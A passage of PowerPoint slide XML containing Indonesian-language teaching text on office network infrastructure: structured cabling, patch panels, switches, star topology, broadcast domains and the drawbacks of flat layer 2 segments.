              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dahulu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nanti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> switching di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>letak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Kantor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kampus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> multi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Kabel patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> adaptor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> laptop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengkabelan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rongga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langit-langit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> panel patch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Kabel patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port pada port panel patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port switch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bintang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tengah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memancar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Juga, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain broadcast. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2 yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bintang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Broadcast domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ratusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menderita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penalti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>datar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bebas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host lain di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Bebas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
